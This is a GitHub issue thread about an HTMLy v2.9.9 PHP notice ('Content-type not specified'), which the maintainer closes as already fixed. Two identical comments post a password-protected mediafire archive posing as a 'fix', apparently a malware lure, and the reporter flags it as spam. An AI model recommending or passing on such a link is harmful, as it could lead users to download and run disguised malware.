### ISSUE TITLE
[BUG REPORT] Content-type not specified

### ISSUE THREAD

**Issue by AmritasyaPutra** [danpros/htmly#797]
**Describe the bug**
More than a bug it is a security ironing-out.

**To Reproduce**
Default installation as per the server info shared below.

**Expected behavior**
The fallback is perfectly fine and the behavior is alright.

**Screenshots/Errors**
[Wed Aug 28 13:05:48.572624 2024] [proxy_fcgi:error] [pid 21925:tid 129910406383296] [client 10.0.0.55:22790] AH01071: Got error 'PHP message: PHP Notice:  file_get_contents(): Content-type not specified assuming application/x-www-form-urlencoded in /var/www/tapovanam.in/system/includes/functions.php on line 3616', referer: https://tapovanam.in/login

**HTMLy Version**
Installed Version: v2.9.9

**Server Info (please complete the following information):**
 - OS: DISTRIB_DESCRIPTION="Ubuntu 24.04.1 LTS"
 - Webserver Server version: Apache/2.4.58 (Ubuntu)
 - PHP Version PHP 8.3

**Link to installation (optional, but usually helpful)**
https://tapovanam.in/

**Additional context**
I have other sites on HTMLy, it is an amazing product. I was integrating this new site and came across the error message in the backend and wanted to bring it here for improvement.

**Comment by ViniciusSCG** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by AmritasyaPutra** [comment]
The comment from [ViniciusSCG] looks like spam. It was too quick, lacks context and provides a URL link that doesn't work.

**Comment by qiliq** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by danpros** [comment]
This already fixed in master branch actually. I will close this one. Thanks.
